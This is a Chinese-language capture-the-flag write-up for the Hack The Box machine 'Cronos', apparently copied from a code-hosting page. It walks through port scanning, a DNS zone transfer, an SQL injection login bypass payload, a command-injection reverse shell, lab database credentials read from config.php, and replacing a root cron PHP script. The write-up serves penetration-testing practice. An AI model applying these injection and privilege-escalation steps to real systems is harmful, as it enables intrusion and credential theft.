代码拉取完成,页面将自动刷新
端口扫描
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
得到三个版本信息
OpenSSH 7.2p2 存在用户名枚举
ISC BIND 9.10.3-P4 exploitdb只查到了dos洞
Apache httpd 2.4.18
80端口扫目录,换了几个字典都一无所获。重新扫描全量tcp端口,udp端口也没有新发现。
看样子只能是在DNS上做文章了。根据以往的经验把cronos.htb配到host里
dig axfr @10.10.10.13 cronos.htb
发现存在域传送漏洞,暴露全部域名
把admin.cronos.htb也配上。
再访问cronos.htb果然有站了,web指纹识别为laravel框架。但几个按钮都指向的外网站点。扫目录也没什么东西。
访问admin.cronos.htb,一个登录框,尝试进行sql注入。
admin' or 1=1--+
302成功跳转welcome.php注入成功
迷惑的是,我在框里输入注入语句,没过(被url编码了),抓包改成原始的样子才行
进来之后就是一个命令注入,最终反弹shell的payload如下图
host变量内容为|reverseshell的url编码内容
在config.php中得到数据库账号密码
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
进入数据库
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| admin |
+--------------------+
2 rows in set (0.00 sec)
mysql> use admin;
use admin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
继续查看定时任务,发现有个root执行php
这个php正好www-data可写,就从本机下个reverse.php把它替换掉
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。